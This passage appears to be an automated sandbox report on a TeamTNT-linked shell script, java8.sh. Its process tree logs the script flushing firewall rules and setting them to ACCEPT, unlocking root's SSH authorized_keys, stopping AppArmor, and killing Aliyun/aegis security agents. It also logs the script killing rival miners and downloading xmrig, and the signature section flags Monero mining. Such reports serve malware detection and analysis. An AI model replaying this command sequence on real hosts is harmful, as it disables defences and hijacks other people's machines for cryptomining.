        • ip6tables (PID: 7207, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-user-logging-input
        • ufw-init New Fork (PID: 7208, Parent: 7083)
        • ip6tables (PID: 7208, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-user-limit-accept
        • ufw-init New Fork (PID: 7209, Parent: 7083)
        • ip6tables (PID: 7209, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-user-limit
        • ufw-init New Fork (PID: 7210, Parent: 7083)
        • ip6tables (PID: 7210, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-skip-to-policy-input
        • ufw-init New Fork (PID: 7211, Parent: 7083)
        • ip6tables (PID: 7211, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-reject-input
        • ufw-init New Fork (PID: 7212, Parent: 7083)
        • ip6tables (PID: 7212, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-after-logging-input
        • ufw-init New Fork (PID: 7213, Parent: 7083)
        • ip6tables (PID: 7213, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-after-input
        • ufw-init New Fork (PID: 7214, Parent: 7083)
        • ip6tables (PID: 7214, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-user-input
        • ufw-init New Fork (PID: 7215, Parent: 7083)
        • ip6tables (PID: 7215, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-before-input
        • ufw-init New Fork (PID: 7216, Parent: 7083)
        • ip6tables (PID: 7216, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-before-logging-input
        • ufw-init New Fork (PID: 7217, Parent: 7083)
        • ip6tables (PID: 7217, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-skip-to-policy-forward
        • ufw-init New Fork (PID: 7218, Parent: 7083)
        • ip6tables (PID: 7218, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-reject-forward
        • ufw-init New Fork (PID: 7219, Parent: 7083)
        • ip6tables (PID: 7219, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-after-logging-forward
        • ufw-init New Fork (PID: 7220, Parent: 7083)
        • ip6tables (PID: 7220, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-after-forward
        • ufw-init New Fork (PID: 7221, Parent: 7083)
        • ip6tables (PID: 7221, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-user-logging-forward
        • ufw-init New Fork (PID: 7222, Parent: 7083)
        • ip6tables (PID: 7222, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-user-forward
        • ufw-init New Fork (PID: 7223, Parent: 7083)
        • ip6tables (PID: 7223, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-before-forward
        • ufw-init New Fork (PID: 7224, Parent: 7083)
        • ip6tables (PID: 7224, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-before-logging-forward
        • ufw-init New Fork (PID: 7225, Parent: 7083)
        • ip6tables (PID: 7225, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-track-forward
        • ufw-init New Fork (PID: 7226, Parent: 7083)
        • ip6tables (PID: 7226, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-track-output
        • ufw-init New Fork (PID: 7227, Parent: 7083)
        • ip6tables (PID: 7227, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-track-input
        • ufw-init New Fork (PID: 7228, Parent: 7083)
        • ip6tables (PID: 7228, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-skip-to-policy-output
        • ufw-init New Fork (PID: 7229, Parent: 7083)
        • ip6tables (PID: 7229, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-reject-output
        • ufw-init New Fork (PID: 7230, Parent: 7083)
        • ip6tables (PID: 7230, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-after-logging-output
        • ufw-init New Fork (PID: 7231, Parent: 7083)
        • ip6tables (PID: 7231, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-after-output
        • ufw-init New Fork (PID: 7232, Parent: 7083)
        • ip6tables (PID: 7232, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-user-logging-output
        • ufw-init New Fork (PID: 7233, Parent: 7083)
        • ip6tables (PID: 7233, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-user-output
        • ufw-init New Fork (PID: 7234, Parent: 7083)
        • ip6tables (PID: 7234, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-before-output
        • ufw-init New Fork (PID: 7235, Parent: 7083)
        • ip6tables (PID: 7235, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -Z ufw6-before-logging-output
        • ufw-init New Fork (PID: 7236, Parent: 7083)
        • ip6tables (PID: 7236, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-logging-deny
        • ufw-init New Fork (PID: 7237, Parent: 7083)
        • ip6tables (PID: 7237, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-logging-allow
        • ufw-init New Fork (PID: 7238, Parent: 7083)
        • ip6tables (PID: 7238, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-not-local
        • ufw-init New Fork (PID: 7239, Parent: 7083)
        • ip6tables (PID: 7239, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-user-logging-input
        • ufw-init New Fork (PID: 7240, Parent: 7083)
        • ip6tables (PID: 7240, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-user-logging-output
        • ufw-init New Fork (PID: 7241, Parent: 7083)
        • ip6tables (PID: 7241, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-user-logging-forward
        • ufw-init New Fork (PID: 7242, Parent: 7083)
        • ip6tables (PID: 7242, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-user-limit-accept
        • ufw-init New Fork (PID: 7243, Parent: 7083)
        • ip6tables (PID: 7243, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-user-limit
        • ufw-init New Fork (PID: 7244, Parent: 7083)
        • ip6tables (PID: 7244, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-user-input
        • ufw-init New Fork (PID: 7245, Parent: 7083)
        • ip6tables (PID: 7245, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-user-forward
        • ufw-init New Fork (PID: 7246, Parent: 7083)
        • ip6tables (PID: 7246, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-user-output
        • ufw-init New Fork (PID: 7247, Parent: 7083)
        • ip6tables (PID: 7247, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-skip-to-policy-input
        • ufw-init New Fork (PID: 7248, Parent: 7083)
        • ip6tables (PID: 7248, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-skip-to-policy-output
        • ufw-init New Fork (PID: 7249, Parent: 7083)
        • ip6tables (PID: 7249, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -X ufw6-skip-to-policy-forward
        • ufw-init New Fork (PID: 7250, Parent: 7083)
        • ip6tables (PID: 7250, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -P INPUT ACCEPT
        • ufw-init New Fork (PID: 7251, Parent: 7083)
        • ip6tables (PID: 7251, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -P OUTPUT ACCEPT
        • ufw-init New Fork (PID: 7252, Parent: 7083)
        • ip6tables (PID: 7252, Parent: 7083, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: ip6tables -P FORWARD ACCEPT
    • bash New Fork (PID: 7253, Parent: 7068)
    • iptables (PID: 7253, Parent: 7068, MD5: 1ab05fef765b6342cdfadaa5275b33af) Arguments: iptables -F
    • bash New Fork (PID: 7254, Parent: 7068)
    • sudo (PID: 7254, Parent: 7068, MD5: eb8c10001fe28b9c4c2e42b96347f6db) Arguments: sudo sysctl kernel.nmi_watchdog=0
      • sudo New Fork (PID: 7255, Parent: 7254)
      • sysctl (PID: 7255, Parent: 7254, MD5: 541526e2a8cd62a0928ceae852c583aa) Arguments: sysctl kernel.nmi_watchdog=0
    • bash New Fork (PID: 7256, Parent: 7068)
    • sysctl (PID: 7256, Parent: 7068, MD5: 541526e2a8cd62a0928ceae852c583aa) Arguments: sysctl kernel.nmi_watchdog=0
    • bash New Fork (PID: 7257, Parent: 7068)
    • chattr (PID: 7257, Parent: 7068, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -iae /root/.ssh/
    • bash New Fork (PID: 7258, Parent: 7068)
    • chattr (PID: 7258, Parent: 7068, MD5: fae2c2deaeca3bbf906fb8034304ad32) Arguments: chattr -iae /root/.ssh/authorized_keys
    • bash New Fork (PID: 7259, Parent: 7068)
    • rm (PID: 7259, Parent: 7068, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /tmp/addres*
    • bash New Fork (PID: 7260, Parent: 7068)
    • rm (PID: 7260, Parent: 7068, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /tmp/walle*
    • bash New Fork (PID: 7261, Parent: 7068)
    • rm (PID: 7261, Parent: 7068, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /tmp/keys
    • bash New Fork (PID: 7262, Parent: 7068)
    • ps (PID: 7262, Parent: 7068, MD5: c8800d39e018fb66b46d5804160ac13e) Arguments: ps aux
    • bash New Fork (PID: 7263, Parent: 7068)
    • grep (PID: 7263, Parent: 7068, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -i [a]liyun
    • bash New Fork (PID: 7264, Parent: 7068)
    • ps (PID: 7264, Parent: 7068, MD5: c8800d39e018fb66b46d5804160ac13e) Arguments: ps aux
    • bash New Fork (PID: 7265, Parent: 7068)
    • grep (PID: 7265, Parent: 7068, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -i [y]unjing
    • bash New Fork (PID: 7266, Parent: 7068)
    • bash New Fork (PID: 7267, Parent: 7068)
    • service (PID: 7267, Parent: 7068, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service apparmor stop
      • service New Fork (PID: 7268, Parent: 7267)
      • basename (PID: 7268, Parent: 7267, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
      • service New Fork (PID: 7269, Parent: 7267)
      • basename (PID: 7269, Parent: 7267, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
      • service New Fork (PID: 7270, Parent: 7267)
      • systemctl (PID: 7270, Parent: 7267, MD5: 94a9ff38667d3d9be93633f0fa83c687) Arguments: systemctl --quiet is-active multi-user.target
      • service New Fork (PID: 7271, Parent: 7267)
        • service New Fork (PID: 7272, Parent: 7271)
        • systemctl (PID: 7272, Parent: 7271, MD5: 94a9ff38667d3d9be93633f0fa83c687) Arguments: systemctl list-unit-files --full --type=socket
        • service New Fork (PID: 7273, Parent: 7271)
        • sed (PID: 7273, Parent: 7271, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
    • systemctl (PID: 7267, Parent: 7068, MD5: 94a9ff38667d3d9be93633f0fa83c687) Arguments: systemctl stop apparmor.service
    • bash New Fork (PID: 7290, Parent: 7068)
    • systemctl (PID: 7290, Parent: 7068, MD5: 94a9ff38667d3d9be93633f0fa83c687) Arguments: systemctl disable apparmor
      • systemd-sysv-install (PID: 7291, Parent: 7290, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: /lib/systemd/systemd-sysv-install disable apparmor
        • getopt (PID: 7292, Parent: 7291, MD5: 1a12f43596437b1bf346d52618b3b1b7) Arguments: getopt -o r: --long root: -- disable apparmor
        • update-rc.d (PID: 7293, Parent: 7291, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/sbin/update-rc.d apparmor defaults
          • systemctl (PID: 7294, Parent: 7293, MD5: 94a9ff38667d3d9be93633f0fa83c687) Arguments: systemctl daemon-reload
        • update-rc.d (PID: 7298, Parent: 7291, MD5: 16a21f464119ea7fad1d3660de963637) Arguments: /usr/sbin/update-rc.d apparmor disable
          • systemctl (PID: 7299, Parent: 7298, MD5: 94a9ff38667d3d9be93633f0fa83c687) Arguments: systemctl daemon-reload
    • bash New Fork (PID: 7306, Parent: 7068)
    • service (PID: 7306, Parent: 7068, MD5: 1e6b1c887c59a315edb7eb9a315fc84c) Arguments: service aliyun.service stop
      • service New Fork (PID: 7307, Parent: 7306)
      • basename (PID: 7307, Parent: 7306, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
      • service New Fork (PID: 7308, Parent: 7306)
      • basename (PID: 7308, Parent: 7306, MD5: 3283660e59f128df18bec9b96fbd4d41) Arguments: basename /usr/sbin/service
      • service New Fork (PID: 7309, Parent: 7306)
      • systemctl (PID: 7309, Parent: 7306, MD5: 94a9ff38667d3d9be93633f0fa83c687) Arguments: systemctl --quiet is-active multi-user.target
      • service New Fork (PID: 7310, Parent: 7306)
        • service New Fork (PID: 7311, Parent: 7310)
        • systemctl (PID: 7311, Parent: 7310, MD5: 94a9ff38667d3d9be93633f0fa83c687) Arguments: systemctl list-unit-files --full --type=socket
        • service New Fork (PID: 7312, Parent: 7310)
        • sed (PID: 7312, Parent: 7310, MD5: 885062561f66aa1d4af4c54b9e7cc81a) Arguments: sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
    • systemctl (PID: 7306, Parent: 7068, MD5: 94a9ff38667d3d9be93633f0fa83c687) Arguments: systemctl stop aliyun.service.service
    • bash New Fork (PID: 7314, Parent: 7068)
    • systemctl (PID: 7314, Parent: 7068, MD5: 94a9ff38667d3d9be93633f0fa83c687) Arguments: systemctl disable aliyun.service
    • bash New Fork (PID: 7315, Parent: 7068)
    • ps (PID: 7315, Parent: 7068, MD5: c8800d39e018fb66b46d5804160ac13e) Arguments: ps aux
    • bash New Fork (PID: 7316, Parent: 7068)
    • grep (PID: 7316, Parent: 7068, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v grep
    • bash New Fork (PID: 7317, Parent: 7068)
    • grep (PID: 7317, Parent: 7068, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep aegis
    • bash New Fork (PID: 7318, Parent: 7068)
    • awk (PID: 7318, Parent: 7068, MD5: 7e9b2ed1272331cfbd2aac2e5eb3f84b) Arguments: awk "{print $2}"
    • bash New Fork (PID: 7319, Parent: 7068)
    • xargs (PID: 7319, Parent: 7068, MD5: 67d30da7ca6e766bb5a005e77f928efb) Arguments: xargs -I % kill -9 %
    • bash New Fork (PID: 7320, Parent: 7068)
    • ps (PID: 7320, Parent: 7068, MD5: c8800d39e018fb66b46d5804160ac13e) Arguments: ps aux
    • bash New Fork (PID: 7321, Parent: 7068)
    • grep (PID: 7321, Parent: 7068, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep -v grep
    • bash New Fork (PID: 7322, Parent: 7068)
    • grep (PID: 7322, Parent: 7068, MD5: 1e6ebb9dd094f774478f72727bdba0f5) Arguments: grep Yun
    • bash New Fork (PID: 7323, Parent: 7068)
    • awk (PID: 7323, Parent: 7068, MD5: 7e9b2ed1272331cfbd2aac2e5eb3f84b) Arguments: awk "{print $2}"
    • bash New Fork (PID: 7324, Parent: 7068)
    • xargs (PID: 7324, Parent: 7068, MD5: 67d30da7ca6e766bb5a005e77f928efb) Arguments: xargs -I % kill -9 %
    • bash New Fork (PID: 7327, Parent: 7068)
    • rm (PID: 7327, Parent: 7068, MD5: aa2b5496fdbfd88e38791ab81f90b95b) Arguments: rm -rf /usr/local/aegis
    • bash New Fork (PID: 7328, Parent: 7068)
    • id (PID: 7328, Parent: 7068, MD5: 36f29256a85dfd77d931750f1335b7ab) Arguments: id -u
    • bash New Fork (PID: 7329, Parent: 7068)
    • nproc (PID: 7329, Parent: 7068, MD5: 04dd2a7de93f86cdd6a12c0c30da1621) Arguments: nproc
    • bash New Fork (PID: 7330, Parent: 7068)
    • sysctl (PID: 7330, Parent: 7068, MD5: 541526e2a8cd62a0928ceae852c583aa) Arguments: sysctl -w vm.nr_hugepages=1
    • bash New Fork (PID: 7331, Parent: 7068)
    • find (PID: 7331, Parent: 7068, MD5: b68ef002f84cc54dd472238ba7df80ab) Arguments: find /sys/devices/system/node/node0 -maxdepth 0 -type d
    • bash New Fork (PID: 7333, Parent: 7068)
      • bash New Fork (PID: 7334, Parent: 7333)
      • bash New Fork (PID: 7335, Parent: 7333)
      • cut (PID: 7335, Parent: 7333, MD5: d8ed0ea8f22c0de0f8692d4d9f1759d3) Arguments: cut -f1 -d.
    • bash New Fork (PID: 7336, Parent: 7068)
    • sudo (PID: 7336, Parent: 7068, MD5: eb8c10001fe28b9c4c2e42b96347f6db) Arguments: sudo -n true
      • sudo New Fork (PID: 7337, Parent: 7336)
      • true (PID: 7337, Parent: 7336, MD5: 589a58ff455dbd092cb3ba3dd2c4c63e) Arguments: true
    • bash New Fork (PID: 7338, Parent: 7068)
    • sudo (PID: 7338, Parent: 7068, MD5: eb8c10001fe28b9c4c2e42b96347f6db) Arguments: sudo -n true
      • sudo New Fork (PID: 7339, Parent: 7338)
      • true (PID: 7339, Parent: 7338, MD5: 589a58ff455dbd092cb3ba3dd2c4c63e) Arguments: true
    • bash New Fork (PID: 7340, Parent: 7068)
    • sudo (PID: 7340, Parent: 7068, MD5: eb8c10001fe28b9c4c2e42b96347f6db) Arguments: sudo systemctl stop xmrig.service
      • sudo New Fork (PID: 7341, Parent: 7340)
      • systemctl (PID: 7341, Parent: 7340, MD5: 94a9ff38667d3d9be93633f0fa83c687) Arguments: systemctl stop xmrig.service
    • bash New Fork (PID: 7342, Parent: 7068)
    • killall (PID: 7342, Parent: 7068, MD5: cd2adedbee501869ac691b88af39cd8b) Arguments: killall -9 xmrig
    • bash New Fork (PID: 7343, Parent: 7068)
    • curl (PID: 7343, Parent: 7068, MD5: add6bc2195e82c55985ccf49fd4048e6) Arguments: curl -L --progress-bar https://github.com/xmrig/xmrig/releases/download/v6.18.0/xmrig-6.18.0-linux-static-x64.tar.gz -o /tmp/xmrig.tar.gz
  • systemd New Fork (PID: 7274, Parent: 1)
  • true (PID: 7274, Parent: 1, MD5: 589a58ff455dbd092cb3ba3dd2c4c63e) Arguments: /bin/true
  • systemd New Fork (PID: 7296, Parent: 7295)
  • snapd-env-generator (PID: 7296, Parent: 7295, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 7301, Parent: 7300)
  • snapd-env-generator (PID: 7301, Parent: 7300, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 7304, Parent: 7303)
  • snapd-env-generator (PID: 7304, Parent: 7303, MD5: 3633b075f40283ec938a2a6a89671b0e) Arguments: /usr/lib/systemd/system-environment-generators/snapd-env-generator
  • systemd New Fork (PID: 7379, Parent: 1)
  • whoopsie (PID: 7379, Parent: 1, MD5: d3a6915d0e7398fb4c89a037c13959c8) Arguments: /usr/bin/whoopsie -f
  • dpkg (PID: 7381, Parent: 7378, MD5: 5e18156b434fc45062eec2f28b9147be) Arguments: dpkg --print-architecture
  • cleanup
SourceRuleDescriptionAuthorStrings
java8.shJoeSecurity_TeamTNT_4Yara detected TeamTNTJoe Security
    No Snort rule has matched

    Click to jump to signature section

    Show All Signature Results

    Bitcoin Miner

    barindex
    Source: Yara matchFile source: java8.sh, type: SAMPLE
    Source: java8.shString found in binary or memory: echo "[*] Looking for the latest version of Xmrig miner"
    Source: bash "/tmp/java8.sh"Stdout: monero
    Source: bash "/tmp/java8.sh"Stdout: xmrig
    Source: bash "/tmp/java8.sh"Stderr: xmrig
    Source: /usr/bin/ps (PID: 7262)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/ps (PID: 7264)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/ps (PID: 7315)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior
    Source: /usr/bin/ps (PID: 7320)Reads CPU info from /sys: /sys/devices/system/cpu/onlineJump to behavior

    Spreading

    barindex
    Source: java8.shString: #check curl, wget

    Networking

    bar